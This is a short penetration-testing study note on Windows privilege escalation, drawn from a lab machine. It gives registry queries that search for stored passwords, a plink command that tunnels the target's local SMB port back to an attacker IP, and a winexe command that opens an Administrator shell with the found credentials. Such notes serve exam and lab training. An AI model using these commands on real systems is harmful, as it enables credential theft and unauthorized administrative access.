// notes/ PrivEsc — Windows
🪟

Stored Passwords And Port Forwarding

Credentials can be stored in the registry and some ports are on the machine are only accessible from the inside (itself).

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/stored-passwords-and-port-forwarding

Stored Passwords and Port Forwarding

Overview

Credentials can be stored in the registry and some ports are on the machine are only accessible from the inside (itself).

What if the user we landed on is an Administrator but just needs to provide credentials to execute commands as system?

Registry Passwords

powerquery
01reg query HKLM /f password /t REG_SZ /s
02reg query HKCU /f password /t REG_SZ /s
powerquery
01reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Example output

<figure><img src="/files/EkGL9BCwIJIqfw1bm8KH" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>

Port Forwarding

code
01netstat -ano
<figure><img src="/files/JR4nRQU0WyY1i8Laz2s0" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>

Plink is an SSH and Telnet client which will allow us to port forward on the machine

Upload and Run plink.exe to make it ssh into your machine via the forwarded local port 445, allowing you to access the local port 445.

powerquery
01plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10

You'll be in box inception inside of your attacker machine.

Use winexe to start a shell as Administrator over the port forward connection

bash
$winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe

{% hint style="info" %} If there's a credential being leaked in a CTF environment chances are it leads to something else so don't disregard it {% endhint %}

{% embed url="https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html" %}